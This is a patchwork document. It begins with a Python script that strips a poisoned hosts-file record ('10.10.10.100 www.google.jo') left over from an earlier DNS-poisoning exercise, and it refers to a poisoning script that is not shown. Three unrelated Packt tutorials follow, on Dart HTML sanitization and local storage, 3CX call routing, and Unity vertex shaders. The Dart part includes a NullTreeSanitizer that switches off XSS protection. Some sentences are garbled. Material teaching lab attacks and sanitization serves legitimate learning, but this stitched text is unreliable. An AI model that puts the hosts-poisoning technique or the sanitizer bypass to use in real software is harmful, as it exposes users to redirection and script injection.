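We recovered the original hosts file by hand earlier; if you prefer to script the cleanup too, the following is a small companion sketch in the same style as the poisoning script above. The record and path are assumptions taken from this example (adjust them to whatever your own script appended), and, like the poisoning script, it must run with admin privileges:

# cleanup sketch: removes the record appended by the script above
import os

hosts_path = "C:\\Windows\\System32\\drivers\\etc\\hosts"
poisoned_record = "10.10.10.100 www.google.jo"  # the line we appended earlier

# keep every line except the injected record
with open(hosts_path, "r") as f:
    lines = [line for line in f if poisoned_record not in line]

with open(hosts_path, "w") as f:
    f.writelines(lines)

# flush the cached DNS so the restored mapping takes effect
os.system("ipconfig /flushdns")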

Handle Web Applications

Packt
20 Oct 2014
13 min read
In this article by Ivo Balbaert author of Dart Cookbook, we will cover the following recipes: Sanitizing HTML Using a browser's local storage Using an application cache to work offline Preventing an onSubmit event from reloading the page (For more resources related to this topic, see here.) Sanitizing HTML We've all heard of (or perhaps even experienced) cross-site scripting (XSS) attacks, where evil minded attackers try to inject client-side script or SQL statements into web pages. This could be done to gain access to session cookies or database data, or to get elevated access-privileges to sensitive page content. To verify an HTML document and produce a new HTML document that preserves only whatever tags are designated safe is called sanitizing the HTML. How to do it... Look at the web project sanitization. Run the following script and see how the text content and default sanitization works: See how the default sanitization works using the following code: var elem1 = new Element.html('<div class="foo">content</div>'); document.body.children.add(elem1); var elem2 = new Element.html('<script class="foo">evil content</script><p>ok?</p>'); document.body.children.add(elem2); The text content and ok? from elem1 and elem2 are displayed, but the console gives the message Removing disallowed element <SCRIPT>. So a script is removed before it can do harm. Sanitize using HtmlEscape, which is mainly used with user-generated content: import 'dart:convert' show HtmlEscape; In main(), use the following code: var unsafe = '<script class="foo">evil   content</script><p>ok?</p>'; var sanitizer = const HtmlEscape(); print(sanitizer.convert(unsafe)); This prints the following output to the console: &lt;script class=&quot;foo&quot;&gt;evil   content&lt;&#x2F;script&gt;&lt;p&gt;ok?&lt;&#x2F;p&gt; Sanitize using node validation. The following code forbids the use of a <p> tag in node1; only <a> tags are allowed: var html_string = '<p class="note">a note aside</p>'; var node1 = new Element.html(        html_string,        validator: new NodeValidatorBuilder()          ..allowElement('a', attributes: ['href'])      ); The console prints the following output: Removing disallowed element <p> Breaking on exception: Bad state: No elements A NullTreeSanitizer for no validation is used as follows: final allHtml = const NullTreeSanitizer(); class NullTreeSanitizer implements NodeTreeSanitizer {      const NullTreeSanitizer();      void sanitizeTree(Node node) {} } It can also be used as follows: var elem3 = new Element.html('<p>a text</p>'); elem3.setInnerHtml(html_string, treeSanitizer: allHtml); How it works... First, we have very good news: Dart automatically sanitizes all methods through which HTML elements are constructed, such as new Element.html(), Element.innerHtml(), and a few others. With them, you can build HTML hardcoded, but also through string interpolation, which entails more risks. The default sanitization removes all scriptable elements and attributes. If you want to escape all characters in a string so that they are transformed into HTML special characters (such as ;&#x2F for a /), use the class HTMLEscape from dart:convert as shown in the second step. The default behavior is to escape apostrophes, greater than/less than, quotes, and slashes. If your application is using untrusted HTML to put in variables, it is strongly advised to use a validation scheme, which only covers the syntax you expect users to feed into your app. 
This is possible because Element.html() has the following optional arguments: Element.html(String html, {NodeValidator validator, NodeTreeSanitizer treeSanitizer}) In step 3, only <a> was an allowed tag. By adding more allowElement rules in cascade, you can allow more tags. Using allowHtml5() permits all HTML5 tags. If you want to remove all control in some cases (perhaps you are dealing with known safe HTML and need to bypass sanitization for performance reasons), you can add the class NullTreeSanitizer to your code, which has no control at all and defines an object allHtml, as shown in step 4. Then, use setInnerHtml() with an optional named attribute treeSanitizer set to allHtml. Using a browser's local storage Local storage (also called the Web Storage API) is widely supported in modern browsers. It enables the application's data to be persisted locally (on the client side) as a map-like structure: a dictionary of key-value string pairs, in fact using JSON strings to store and retrieve data. It provides our application with an offline mode of functioning when the server is not available to store the data in a database. Local storage does not expire, but every application can only access its own data up to a certain limit depending on the browser. In addition, of course, different browsers can't access each other's stores. How to do it... Look at the following example, the local_storage.dart file: import 'dart:html';  Storage local = window.localStorage;  void main() { var job1 = new Job(1, "Web Developer", 6500, "Dart Unlimited") ; Perform the following steps to use the browser's local storage: Write to a local storage with the key Job:1 using the following code: local["Job:${job1.id}"] = job1.toJson; ButtonElement bel = querySelector('#readls'); bel.onClick.listen(readShowData); } A click on the button checks to see whether the key Job:1 can be found in the local storage, and, if so, reads the data in. This is then shown in the data <div>: readShowData(Event e) {    var key = 'Job:1';    if(local.containsKey(key)) { // read data from local storage:    String job = local[key];    querySelector('#data').appendText(job); } }   class Job { int id; String type; int salary; String company; Job(this.id, this.type, this.salary, this.company); String get toJson => '{ "type": "$type", "salary": "$salary", "company": "$company" } '; } The following screenshot depicts how data is stored in and retrieved from a local storage: How it works... You can store data with a certain key in the local storage from the Window class as follows using window.localStorage[key] = data; (both key and data are Strings). You can retrieve it with var data = window.localStorage[key];. In our code, we used the abbreviation Storage local = window.localStorage; because local is a map. You can check the existence of this piece of data in the local storage with containsKey(key); in Chrome (also in other browsers via Developer Tools). You can verify this by navigating to Extra | Tools | Resources | Local Storage (as shown in the previous screenshot), window.localStorage also has a length property; you can query whether it contains something with isEmpty, and you can loop through all stored values using the following code: for(var key in window.localStorage.keys) { String value = window.localStorage[key]; // more code } There's more... 
Local storage can be disabled (by user action, or via an installed plugin or extension), so we must alert the user when this needs to be enabled; we can do this by catching the exception that occurs in this case: try { window.localStorage[key] = data; } on Exception catch (ex) { window.alert("Data not stored: Local storage is disabled!"); } Local storage is a simple key-value store and does have good cross-browser coverage. However, it can only store strings and is a blocking (synchronous) API; this means that it can temporarily pause your web page from responding while it is doing its job storing or reading large amounts of data such as images. Moreover, it has a space limit of 5 MB (this varies with browsers); you can't detect when you are nearing this limit and you can't ask for more space. When the limit is reached, an error occurs so that the user can be informed. These properties make local storage only useful as a temporary data storage tool; this means that it is better than cookies, but not suited for a reliable, database kind of storage. Web storage also has another way of storing data called sessionStorage used in the same way, but this limits the persistence of the data to only the current browser session. So, data is lost when the browser is closed or another application is started in the same browser window. Using an application cache to work offline When, for some reason, our users don't have web access or the website is down for maintenance (or even broken), our web-based applications should also work offline. The browser cache is not robust enough to be able to do this, so HTML5 has given us the mechanism of ApplicationCache. This cache tells the browser which files should be made available offline. The effect is that the application loads and works correctly, even when the user is offline. The files to be held in the cache are specified in a manifest file, which has a .mf or .appcache extension. How to do it... Look at the appcache application; it has a manifest file called appcache.mf. The manifest file can be specified in every web page that has to be cached. This is done with the manifest attribute of the <html> tag: <html manifest="appcache.mf"> If a page has to be cached and doesn't have the manifest attribute, it must be specified in the CACHE section of the manifest file. The manifest file has the following (minimum) content: CACHE MANIFEST # 2012-09-28:v3  CACHE: Cached1.html appcache.css appcache.dart http://dart.googlecode.com/svn/branches/bleeding_edge/dart/client/dart.js  NETWORK: *  FALLBACK: / offline.html Run cached1.html. This displays the This page is cached, and works offline! text. Change the text to This page has been changed! and reload the browser. You don't see the changed text because the page is created from the application cache. When the manifest file is changed (change version v1 to v2), the cache becomes invalid and the new version of the page is loaded with the This page has been changed! text. The Dart script appcache.dart of the page should contain the following minimal code to access the cache: main() { new AppCache(window.applicationCache); }  class AppCache { ApplicationCache appCache;  AppCache(this.appCache) {    appCache.onUpdateReady.listen((e) => updateReady());    appCache.onError.listen(onCacheError); }  void updateReady() {    if (appCache.status == ApplicationCache.UPDATEREADY) {      // The browser downloaded a new app cache. Alert the user:      appCache.swapCache();      window.alert('A new version of this site is available. 
Please reload.');    } }  void onCacheError(Event e) {      print('Cache error: ${e}');      // Implement more complete error reporting to developers } } How it works... The CACHE section in the manifest file enumerates all the entries that have to be cached. The NETWORK: and * options mean that to use all other resources the user has to be online. FALLBACK specifies that offline.html will be displayed if the user is offline and a resource is inaccessible. A page is cached when either of the following is true: Its HTML tag has a manifest attribute pointing to the manifest file The page is specified in the CACHE section of the manifest file The browser is notified when the manifest file is changed, and the user will be forced to refresh its cached resources. Adding a timestamp and/or a version number such as # 2014-05-18:v1 works fine. Changing the date or the version invalidates the cache, and the updated pages are again loaded from the server. To access the browser's app cache from your code, use the window.applicationCache object. Make an object of a class AppCache, and alert the user when the application cache has become invalid (the status is UPDATEREADY) by defining an onUpdateReady listener. There's more... The other known states of the application cache are UNCACHED, IDLE, CHECKING, DOWNLOADING, and OBSOLETE. To log all these cache events, you could add the following listeners to the appCache constructor: appCache.onCached.listen(onCacheEvent); appCache.onChecking.listen(onCacheEvent); appCache.onDownloading.listen(onCacheEvent); appCache.onNoUpdate.listen(onCacheEvent); appCache.onObsolete.listen(onCacheEvent); appCache.onProgress.listen(onCacheEvent); Provide an onCacheEvent handler using the following code: void onCacheEvent(Event e) {    print('Cache event: ${e}'); } Preventing an onSubmit event from reloading the page The default action for a submit button on a web page that contains an HTML form is to post all the form data to the server on which the application runs. What if we don't want this to happen? How to do it... Experiment with the submit application by performing the following steps: Our web page submit.html contains the following code: <form id="form1" action="http://www.dartlang.org" method="POST"> <label>Job:<input type="text" name="Job" size="75"></input>    </label>    <input type="submit" value="Job Search">    </form> Comment out all the code in submit.dart. Run the app, enter a job name, and click on the Job Search submit button; the Dart site appears. When the following code is added to submit.dart, clicking on the no button for a longer duration makes the Dart site appear: import 'dart:html';  void main() { querySelector('#form1').onSubmit.listen(submit); }  submit(Event e) {      e.preventDefault(); // code to be executed when button is clicked  } How it works... In the first step, when the submit button is pressed, the browser sees that the method is POST. This method collects the data and names from the input fields and sends it to the URL specified in action to be executed, which only shows the Dart site in our case. To prevent the form from posting the data, make an event handler for the onSubmit event of the form. In this handler code, e.preventDefault(); as the first statement will cancel the default submit action. However, the rest of the submit event handler (and even the same handler of a parent control, should there be one) is still executed on the client side. 
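Once the default action is cancelled, you will usually still want to do something with the form data yourself. The following is a minimal sketch of one way to complete the submit handler above, reading the Job field and posting it in the background with HttpRequest from dart:html. The /search URL and the alert are placeholders for whatever your application actually does with the data:

submit(Event e) {
  e.preventDefault(); // cancel the default POST to the form's action URL
  // read the value typed into the Job field of form1
  InputElement jobInput = querySelector('input[name="Job"]');
  // send the data ourselves, so the page stays in place
  HttpRequest.postFormData('/search', {'Job': jobInput.value})
      .then((HttpRequest response) => window.alert('Search submitted: ${response.status}'))
      .catchError((error) => print('Request failed: $error'));
}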
Summary In this article we learned how to handle web applications, sanitize a HTML, use a browser's local storage, use application cache to work offline, and how to prevent an onSubmit event from reloading a page. Resources for Article: Further resources on this subject: Handling the DOM in Dart [Article] QR Codes, Geolocation, Google Maps API, and HTML5 Video [Article] HTML5 Game Development – A Ball-shooting Machine with Physics Engine [Article]

Call Control using 3CX

Packt
11 Feb 2010
9 min read
Let's get started! Ring groups Ring groups are designed to direct calls to a group of extensions so that a person can answer the call. An incoming call will ring at several extensions at once, and the one who picks up the phone gets control of that call. At that point, he/she can transfer the call, send it to voicemail, or hang up. Ring groups are my preferred call routing method. Does anyone really like those automated greetings? I don't. We will of course, set those up because they do have some great uses. However, if you like your customers to get a real live voice when they call, you have two choices—either direct the call to an extension or use a ring group and have a few phones ring at once. To create a ring group, we will use the 3CX web interface. There are several ways to do this. From the top toolbar menu, click Add | Ring Group. In the following screenshot, I chose Add | Ring Group: The following screenshot shows another way of adding a ring group using the Ring Groups section in the navigation pane on the left-hand side. Then click on the Add Ring Group button on the toolbar: Once we click Add Ring Group, 3CX will automatically create a Virtual machine number for this ring group as shown in the next screenshot. This helps the system keep track of calls and where they are. This number can be changed to any unused number that you like. As a reseller, I like to keep them the same from client to client. This creates some standardization among all the systems. Now it's time to give the ring group a Name. Here I use MainRingGroup as it lets me know that when a call comes in, it should go to the Main Ring Group. After you create the first one, you can make more such as SalesRingGroup, SupportRingGroup, and so on. We now have three choices for the Ring Strategy: Prioritized Hunt: Starts hunting for a member from the top of the Ring Group Members list and works down until someone picks up the phone or goes to the Destination if no answer section. Ring All: If all the phones in the Ring Group Members section ring at the same time then the first person to pick up gets the call. Paging: This is a paid feature that will open the speakerphone on Ring Group Members. Now you will need to select your Ring Time (Seconds) to determine how long you want the phones to ring before giving up. The default ring time is 20 seconds, which all my clients agree is too long. I'd recommend 10-15 seconds, but remember, if no one picks up the phone, then the caller goes to the next step, such as a Digital Receptionist. If the next step also makes the caller wait another 10-20 seconds, he/she may just hang up. You also need to be sure that you do not exceed the phone company's timeout of diverting calls to their voicemail (which could be turned off) or returning a busy signal. Adding ring group members Ring Group Members are the extensions that you would like the system to call or page in a ring group. If you select the Prioritized Hunt strategy, it will hunt from the top and go down the list. Ring All and Paging will get everyone at once. The listbox on the left will show you a list of available extensions. Select the ones you want and click the Add button. If you are using Prioritized Hunt, you can change the order of the hunt by using the Up and Down buttons. Destination if no answer The last setting as shown in the next screenshot illustrates what to do when no one answers the call. The options are as follows: End Call: Just drop the call, no chance for the caller to talk to someone. 
Connect to Extension: Ring the extension of your choice. Connect to Queue / Ring Group: This sends the caller to a call queue (discussed later in the Call queues section)) or to another ring group. A second ring group could be created for stage two that calls the same group plus additional extensions. Connect to Digital Receptionist: As a person didn't pick up the call, we can now send it to an automated greeting/menu system. Voicemail box for Extension: As the caller has already heard phones ringing, you may just want to put him/her straight to someone's voicemail. Forward to Outside Number: If you have had all the phones in the building ringing and no one has picked up, then you might want to send the caller to a different phone outside of your PBX system. Just make sure that you enter the correct phone number and any area codes that may be required. This will use another simultaneous call license and another phone line. If you have one line only, then this is not the option you can use. Digital Receptionist setup A Digital Receptionist (DR) is not a voicemail box; it's an automated greeting with a menu of choices to choose from. A DR will answer the phone for you if no one is available to answer the phone (directly to an extension or hunt group) or if it is after office hours. You need to set up a DR unless you want all incoming calls to go to someone's voicemail. You will also need it if you want to present the caller with a menu of options. Let's see how to create a DR. Recording a menu prompt The first thing you need to do in order to create a DR is record a greeting. There are a couple of ways to do this. However, first let's create the greeting script. In this greeting, you will be defining your phone menu; that is, you will be directing calls to extensions, hunts, agent groups, and the dial by name directory. Following is an example: Thank you for calling. If you know your party's extension, you may dial it at any time. Or else, please listen to the following options: For Rob, dial 1 For the sales group, dial 2 For Zachary, dial 4 Solicitors, please dial 8 For a dial by name directory, dial 9 I suggest having it written down. This makes it easier to record and also gives the person setting up the DR in 3CX a copy of the menu map. Now that you know what you want your callers to hear when they call, it's time to get it recorded so that we can import it into 3CX. You have a couple of options for recording the greeting script. It doesn't matter which option you use or how you obtain this greeting file, as long as the end format is correct. You can hire a professional announcer, put it to music, and obtain the file from him/her. You can record it using any audio software you like such as Windows Sound Recorder, or any audio recording software. The file needs to be a .wav or an .mp3 file saved in PCM, 8KHz, 16 bit, Mono format. If you have Windows Sound Recorder only, I'd suggest that you try out Audacity. Audacity is an open source audio file program available at http://audacity.sourceforge.net/. Audacity gives you a lot more power such as controlling volume, combining several audio tracks (a music track to go with the announcer), using special effects, and many other cool audio tools. I'm not an expert in it but the basics are easy to do. First, hit the Audacity website and download it, then install it using the defaults. Now let's launch Audacity and set it up to use the correct file format, which will save us any issues later. Start by clicking Edit | Preferences. 
On the Quality tab, select the Default Sample Rate as 8000 Hz. Then change the Default Sample Format to 16-bit as shown in the following screenshot: Now, on the File Formats tab, select WAV (Microsoft 16 bit PCM) from the drop-down list and click OK: Now that those settings are saved, you can record your greeting without having to change any formats. Now it's time to record your greeting. Click on the red Record button as shown in the following screenshot. It will now use your PC's microphone to record the announcer's voice and when the recording is done, click on the Stop button. Press Play to hear it, and if you don't like it, start over again: If you like the way your greeting sounds, then you will need to save it. Click File | Export As WAV... or Export As MP3.... Save it to a location that you remember (for example, c:3CX prompts is a good place) with a descriptive filename. While you are recording this greeting, you might as well record a few more if you have plans for creating multiple DRs: Creating the Digital Receptionist With your greeting script in hand, it's time to create your first DR. In the navigation pane on the left side, click Digital Receptionist, then click Add Digital Receptionist as shown in the following screenshot: Or on the top menu toolbar, click Add | Digital Receptionist: Just like your ring group, the DR gets a Virtual extension number by default, Feel free to change it or stick with it. Give it a Name, (I like to use the same name as the audio greeting filename.) Now, click Browse... and then Add. Browse to your c:3CX prompts directory and select your .wav or .mp3 file as shown in the following screenshot: Next, we need to create the menu system as shown in the following screenshot. We have lots of options available. You can connect to an extension or ring group, transfer directly to someone's voicemail, end the call (my solicitors' option), or start the call by name feature (discussed in the Call by name setup section). At any time during playback, callers can dial the extension number; they don't have to hear all the options. I usually explain this in the DR recorded greeting.

The Vertex Functions

Packt
01 Feb 2016
18 min read
In this article by Alan Zucconi, author of the book Unity 5.x Shaders and Effects Cookbook, we will see that the term shader originates from the fact that Cg has been mainly used to simulate realistic lighting conditions (shadows) on three-dimensional models. Despite this, shaders are now much more than that. They not only define the way objects are going to look, but also redefine their shapes entirely. If you want to learn how to manipulate the geometry of a three-dimensional object only via shaders, this article is for you. In this article, you will learn the following: Extruding your models Implementing a snow shader Implementing a volumetric explosion (For more resources related to this topic, see here.) In this article, we will explain that 3D models are not just a collection of triangles. Each vertex can contain data, which is essential for correctly rendering the model itself. This article will explore how to access this information in order to use it in a shader. We will also explore how the geometry of an object can be deformed simply using Cg code. Extruding your models One of the biggest problems in games is repetition. Creating new content is a time-consuming task and when you have to face a thousand enemies, the chances are that they will all look the same. A relatively cheap technique to add variations to your models is using a shader that alters its basic geometry. This recipe will show a technique called normal extrusion, which can be used to create a chubbier or skinnier version of a model, as shown in the following image with the soldier from the Unity camp (Demo Gameplay): Getting ready For this recipe, we need to have access to the shader used by the model that you want to alter. Once you have it, we will duplicate it so that we can edit it safely. It can be done as follows: Find the shader that your model is using and, once selected, duplicate it by pressing Ctrl+D. Duplicate the original material of the model and assign the cloned shader to it. Assign the new material to your model and start editing it. For this effect to work, your model should have normals. How to do it… To create this effect, start by modifying the duplicated shader as shown in the following: Let's start by adding a property to our shader, which will be used to modulate its extrusion. The range that is presented here goes from -1 to +1;however, you might have to adjust that according to your own needs, as follows: _Amount ("Extrusion Amount", Range(-1,+1)) = 0 Couple the property with its respective variable, as shown in the following: float _Amount; Change the pragma directive so that it now uses a vertex modifier. You can do this by adding vertex:function_name at the end of it. In our case, we have called the vertfunction, as follows: #pragma surface surf Lambert vertex:vert Add the following vertex modifier: void vert (inout appdata_full v) { v.vertex.xyz += v.normal * _Amount; } The shader is now ready; you can use the Extrusion Amount slider in the Inspectormaterial to make your model skinnier or chubbier. How it works… Surface shaders works in two steps: the surface function and the vertex modifier. It takes the data structure of a vertex (which is usually called appdata_full) and applies a transformation to it. This gives us the freedom to virtually do everything with the geometry of our model. We signal the graphics processing unit(GPU) that such a function exists by adding vertex:vert to the pragma directive of the surface shader. 
There's more…

If you have multiple enemies and you want each one to have their own weight, you have to create a different material for each of them. This is necessary because materials are normally shared between models, and changing one will change all of them. There are several ways in which you can do this; the quickest one is to create a script that does it for you automatically. The following script, once attached to an object with a Renderer, will duplicate its first material and set the _Amount property automatically:

using UnityEngine;

public class NormalExtruder : MonoBehaviour {

  [Range(-0.0001f, 0.0001f)]
  public float amount = 0;

  // Use this for initialization
  void Start () {
    Material material = GetComponent<Renderer>().sharedMaterial;
    Material newMaterial = new Material(material);
    newMaterial.SetFloat("_Amount", amount);
    GetComponent<Renderer>().material = newMaterial;
  }
}

Adding extrusion maps

This technique can actually be improved even further. We can add an extra texture (or use the alpha channel of the main one) to indicate the amount of extrusion. This allows much better control over which parts are raised or lowered. The following code shows how it is possible to achieve such an effect:

sampler2D _ExtrusionTex;

void vert(inout appdata_full v) {
  float4 tex = tex2Dlod (_ExtrusionTex, float4(v.texcoord.xy,0,0));
  float extrusion = tex.r * 2 - 1;
  v.vertex.xyz += v.normal * _Amount * extrusion;
}

The red channel of _ExtrusionTex is used as a multiplying coefficient for the normal extrusion. A value of 0.5 leaves the model unaffected; darker or lighter shades are used to extrude vertices inward or outward, respectively. You should notice that to sample a texture in a vertex modifier, tex2Dlod should be used instead of tex2D.

In shaders, colour channels go from 0 to 1, although sometimes you need to represent negative values as well (such as inward extrusion). When this is the case, treat 0.5 as zero, with smaller values as negative and higher values as positive. This is exactly what happens with normals, which are usually encoded in RGB textures. The UnpackNormal() function is used to map a value in the (0,1) range onto the (-1,+1) range. Mathematically speaking, this is equivalent to tex.r * 2 - 1.

Extrusion maps are perfect for zombifying characters by shrinking the skin in order to highlight the shape of the bones underneath. The following image shows how a "healthy" soldier can be transformed into a corpse using a shader and an extrusion map. Compared to the previous example, you can notice how the clothing is unaffected. The shader used in the following image also darkens the extruded regions in order to give an even more emaciated look to the soldier:
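Before moving on, one more practical note. If creating one material per enemy feels heavy, a MaterialPropertyBlock can give each renderer its own extrusion value without duplicating materials. The following C# sketch illustrates that alternative; it is not part of the original recipe, the _Amount name comes from the shader above, and the random range is only an example.

using UnityEngine;

// A sketch of an alternative to duplicating materials: MaterialPropertyBlock
// lets each renderer override _Amount without creating a new material.
// The property name "_Amount" is the one from the recipe; the random range
// here is only an example.
public class RandomExtrusion : MonoBehaviour
{
    public float minAmount = -0.2f;
    public float maxAmount = 0.2f;

    void Start()
    {
        Renderer rend = GetComponent<Renderer>();
        MaterialPropertyBlock block = new MaterialPropertyBlock();

        rend.GetPropertyBlock(block);
        block.SetFloat("_Amount", Random.Range(minAmount, maxAmount));
        rend.SetPropertyBlock(block);
    }
}

Whether you duplicate materials or use property blocks is a trade-off between simplicity and the number of material instances you end up managing.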
Implementing a snow shader

The simulation of snow has always been a challenge in games. The vast majority of games simply bake snow directly into the models' textures so that their tops look white. However, what if one of these objects starts rotating? Snow is not just a lick of paint on a surface; it is a proper accumulation of material and it should be treated as such. This recipe will show how to give a snowy look to your models using just a shader.

This effect is achieved in two steps. First, a white colour is used for all the triangles facing the sky. Second, their vertices are extruded to simulate the effect of snow accumulation. You can see the result in the following image:

Keep in mind that this recipe does not aim to create a photorealistic snow effect. It provides a good starting point; however, it is up to an artist to create the right textures and find the right parameters to make it fit your game.

Getting ready

This effect is purely based on shaders. We will need to do the following:

1. Create a new shader for the snow effect.
2. Create a new material for the shader.
3. Assign the newly created material to the object that you want to be snowy.

How to do it…

To create a snowy effect, open your shader and make the following changes:

1. Replace the properties of the shader with the following ones:

_MainColor("Main Color", Color) = (1.0,1.0,1.0,1.0)
_MainTex("Base (RGB)", 2D) = "white" {}
_Bump("Bump", 2D) = "bump" {}
_Snow("Level of snow", Range(1, -1)) = 1
_SnowColor("Color of snow", Color) = (1.0,1.0,1.0,1.0)
_SnowDirection("Direction of snow", Vector) = (0,1,0)
_SnowDepth("Depth of snow", Range(0,1)) = 0

2. Complete them with their relative variables, as follows:

sampler2D _MainTex;
sampler2D _Bump;
float _Snow;
float4 _SnowColor;
float4 _MainColor;
float4 _SnowDirection;
float _SnowDepth;

3. Replace the Input structure with the following:

struct Input {
  float2 uv_MainTex;
  float2 uv_Bump;
  float3 worldNormal;
  INTERNAL_DATA
};

4. Replace the surface function with the following one. It will color the snowy parts of the model white:

void surf(Input IN, inout SurfaceOutputStandard o) {
  half4 c = tex2D(_MainTex, IN.uv_MainTex);
  o.Normal = UnpackNormal(tex2D(_Bump, IN.uv_Bump));
  if (dot(WorldNormalVector(IN, o.Normal), _SnowDirection.xyz) >= _Snow)
    o.Albedo = _SnowColor.rgb;
  else
    o.Albedo = c.rgb * _MainColor;
  o.Alpha = 1;
}

5. Configure the pragma directive so that it uses a vertex modifier, as follows:

#pragma surface surf Standard vertex:vert

6. Add the following vertex modifier, which extrudes the vertices covered in snow:

void vert(inout appdata_full v) {
  float4 sn = mul(UNITY_MATRIX_IT_MV, _SnowDirection);
  if (dot(v.normal, sn.xyz) >= _Snow)
    v.vertex.xyz += (sn.xyz + v.normal) * _SnowDepth * _Snow;
}

You can now use the material's Inspector to select how much of your model is going to be covered and how thick the snow should be.

How it works…

This shader works in two steps.

Coloring the surface

The first one alters the color of the triangles that are facing the sky. It affects all the triangles with a normal direction similar to _SnowDirection. Comparing unit vectors can be done using the dot product. When two vectors are orthogonal, their dot product is zero; it is one (or minus one) when they are parallel to each other. The _Snow property is used to decide how aligned they should be in order to be considered facing the sky.

If you look closely at the surface function, you can see that we are not directly dotting the normal and the snow direction. This is because they are usually defined in different spaces. The snow direction is expressed in world coordinates, while the object normals are usually relative to the model itself. If we rotate the model, its normals will not change, which is not what we want.
To fix this, we need to convert the normals from their object coordinates to world coordinates. This is done with the WorldNormalVector() function, as follows:

if (dot(WorldNormalVector(IN, o.Normal), _SnowDirection.xyz) >= _Snow)
  o.Albedo = _SnowColor.rgb;
else
  o.Albedo = c.rgb * _MainColor;

This shader simply colors the model white; a more advanced one should initialize the SurfaceOutputStandard structure with textures and parameters from a realistic snow material.

Altering the geometry

The second effect of this shader alters the geometry to simulate the accumulation of snow. Firstly, we identify the triangles that have been coloured white by testing the same condition used in the surface function. This time, unfortunately, we cannot rely on WorldNormalVector(), as the SurfaceOutputStandard structure is not yet initialized in the vertex modifier. We use this other method instead, which converts _SnowDirection into object coordinates:

float4 sn = mul(UNITY_MATRIX_IT_MV, _SnowDirection);

Then, we can extrude the geometry to simulate the accumulation of snow, as shown in the following:

if (dot(v.normal, sn.xyz) >= _Snow)
  v.vertex.xyz += (sn.xyz + v.normal) * _SnowDepth * _Snow;

Once again, this is a very basic effect. One could use a texture map to control the accumulation of snow more precisely or to give it a peculiar, uneven look.

See also

If you need high-quality snow effects and props for your game, you can also check the following resources in the Unity Asset Store:

Winter Suite ($30): A much more sophisticated version of the snow shader presented in this recipe can be found at https://www.assetstore.unity3d.com/en/#!/content/13927
Winter Pack ($60): A very realistic set of props and materials for snowy environments can be found at https://www.assetstore.unity3d.com/en/#!/content/13316
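Before moving on to explosions, here is a small runtime companion to the snow recipe. The following C# sketch is not part of the original recipe; it assumes the property names defined above (_Snow and _SnowDepth, with _Snow running from 1 for no snow toward -1 for full coverage), and the rates are arbitrary.

using UnityEngine;

// A sketch (not part of the original recipe): slowly accumulates snow by
// animating the _Snow and _SnowDepth properties of the snow shader above.
// In this set-up _Snow starts at 1 (no snow) and moves toward -1 (fully
// covered); the rates below are illustrative values.
public class SnowAccumulation : MonoBehaviour
{
    public float coverageRate = 0.05f;   // how fast _Snow decreases per second
    public float depthRate = 0.02f;      // how fast _SnowDepth grows per second
    public float maxDepth = 0.3f;

    private Material material;
    private float snow = 1.0f;
    private float depth = 0.0f;

    void Start()
    {
        // Per-object material copy, so other snowy objects are not affected.
        material = GetComponent<Renderer>().material;
    }

    void Update()
    {
        snow = Mathf.Max(snow - coverageRate * Time.deltaTime, -1.0f);
        depth = Mathf.Min(depth + depthRate * Time.deltaTime, maxDepth);
        material.SetFloat("_Snow", snow);
        material.SetFloat("_SnowDepth", depth);
    }
}

Attached to a snowy object, this gradually increases coverage and thickness, which is a quick way to preview how the two properties interact.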
Implementing a volumetric explosion

The art of game development is a clever trade-off between realism and efficiency. This is particularly true for explosions; they are at the heart of many games, yet the physics behind them is often beyond the computational power of modern machines. Explosions are essentially nothing more than hot balls of gas; hence, the only way to correctly simulate them is by integrating a fluid simulation into your game. As you can imagine, this is infeasible for runtime applications, and many games simply simulate them with particles. When an object explodes, it is common to simply instantiate many fire, smoke, and debris particles that together can produce a believable result. This approach, unfortunately, is not very realistic and is easy to spot. There is an intermediate technique that can be used to achieve a much more realistic effect: volumetric explosions. The idea behind this concept is that explosions are not treated like a bunch of particles anymore; they are evolving three-dimensional objects, not just flat two-dimensional textures.

Getting ready

Start this recipe with the following steps:

1. Create a new shader for this effect.
2. Create a new material to host the shader.
3. Attach the material to a sphere. You can create one directly from the editor by navigating to GameObject | 3D Object | Sphere.

This recipe works well with the standard Unity Sphere; however, if you need big explosions, you might need to use a more high-poly sphere. In fact, a vertex function can only modify the vertices of a mesh. All the other points will be interpolated using the positions of the nearby vertices. Fewer vertices mean lower resolution for your explosions.

For this recipe, you will also need a ramp texture that has, in a gradient, all the colors that your explosion will have. You can create such a texture using GIMP or Photoshop. The following is the one used for this recipe:

Once you have the picture, import it to Unity. Then, from its Inspector, make sure the Filter Mode is set to Bilinear and the Wrap Mode to Clamp. These two settings make sure that the ramp texture is sampled smoothly.

Lastly, you will need a noisy texture. You can find many freely available noise textures on the Internet. The most commonly used ones are generated using Perlin noise.

How to do it…

This effect works in two steps: a vertex function to change the geometry and a surface function to give it the right color. The steps are as follows:

1. Add the following properties for the shader:

_RampTex("Color Ramp", 2D) = "white" {}
_RampOffset("Ramp offset", Range(-0.5,0.5))= 0
_NoiseTex("Noise tex", 2D) = "gray" {}
_Period("Period", Range(0,1)) = 0.5
_Amount("_Amount", Range(0, 1.0)) = 0.1
_ClipRange("ClipRange", Range(0,1)) = 1

2. Add their relative variables so that the Cg code of the shader can actually access them, as follows:

sampler2D _RampTex;
float _RampOffset;
sampler2D _NoiseTex;
float _Period;
float _Amount;
float _ClipRange;

3. Change the Input structure so that it receives the UV data of the noise texture, as shown in the following:

struct Input {
  float2 uv_NoiseTex;
};

4. Add the following vertex function:

void vert(inout appdata_full v) {
  float3 disp = tex2Dlod(_NoiseTex, float4(v.texcoord.xy,0,0));
  float time = sin(_Time[3] *_Period + disp.r*10);
  v.vertex.xyz += v.normal * disp.r * _Amount * time;
}

5. Add the following surface function:

void surf(Input IN, inout SurfaceOutput o) {
  float3 noise = tex2D(_NoiseTex, IN.uv_NoiseTex);
  float n = saturate(noise.r + _RampOffset);
  clip(_ClipRange - n);
  half4 c = tex2D(_RampTex, float2(n,0.5));
  o.Albedo = c.rgb;
  o.Emission = c.rgb*c.a;
}

6. We will specify the vertex function in the pragma directive, adding the nolightmap parameter to prevent Unity from adding realistic lighting to our explosion, as follows:

#pragma surface surf Lambert vertex:vert nolightmap

7. The last step is to select the material and attach the two textures in the relative slots from its Inspector.

This is an animated material, meaning that it evolves over time. You can watch the material changing in the editor by clicking on Animated Materials from the Scene window:

How it works

If you are reading this recipe, you are already familiar with how surface shaders and vertex modifiers work. The main idea behind this effect is to alter the geometry of the sphere in a seemingly chaotic way, exactly as happens in a real explosion. The following image shows how such an explosion looks in the editor. You can see that the original mesh has been heavily deformed:

